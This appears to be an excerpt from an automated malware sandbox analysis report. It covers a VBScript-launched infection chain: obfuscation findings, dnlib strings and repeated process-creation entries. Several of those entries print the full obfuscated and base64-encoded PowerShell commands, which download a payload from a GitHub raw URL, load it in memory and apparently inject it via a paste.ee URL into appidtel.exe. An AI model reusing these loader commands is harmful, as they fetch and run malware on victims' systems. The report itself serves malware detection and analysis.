Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Obfuscated command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"	Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD346300BD pushad ; iretd	5_2_00007FFD346300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD346309AD push ss; retf	5_2_00007FFD346309C6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD34634FF3 push eax; retf	5_2_00007FFD34634FE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD346425CD push edx; retf	6_2_00007FFD34642636
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD34641D9F push eax; iretd	6_2_00007FFD3464233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD346200BD pushad ; iretd	8_2_00007FFD346200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD34627006 push esp; iretd	8_2_00007FFD3462700C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004190B6 push esi; ret	10_2_004190B9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0041AAB9 push esp; retf	10_2_0041AB04
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004123D8 push edi; retf	10_2_004123EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004123E3 push edi; retf	10_2_004123EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004023B0 push esi; iretd	10_2_004023BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0040AC71 push edi; retf	10_2_0040AC73
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004074B7 pushfd ; iretd	10_2_004074B9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00412549 push ebx; iretd	10_2_0041254A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00403590 push eax; ret	10_2_00403592
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00411E28 push ebx; retf	10_2_00411E2D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00406685 push FFFFFFCBh; retf	10_2_0040668C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039009AD push ecx; mov dword ptr [esp], ecx	10_2_039009B6
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ACA3FC push ecx; iretd	17_2_03ACA41A
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ACEB69 push esp; retf	17_2_03ACEBB4
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ACD166 push esi; ret	17_2_03ACD169
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ACA0F1 push ebx; ret	17_2_03ACA0F6
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ABA735 push FFFFFFCBh; retf	17_2_03ABA73C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AC65F9 push ebx; iretd	17_2_03AC65FA
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ABED13 push edi; retf	17_2_03ABED23
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AD356F push es; iretd	17_2_03AD357F
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ABB567 pushfd ; iretd	17_2_03ABB569
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AC6488 push edi; retf	17_2_03AC649F
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036909AD push ecx; mov dword ptr [esp], ecx	19_2_036909B6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_035653DB pushfd ; ret	19_2_035653E3

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
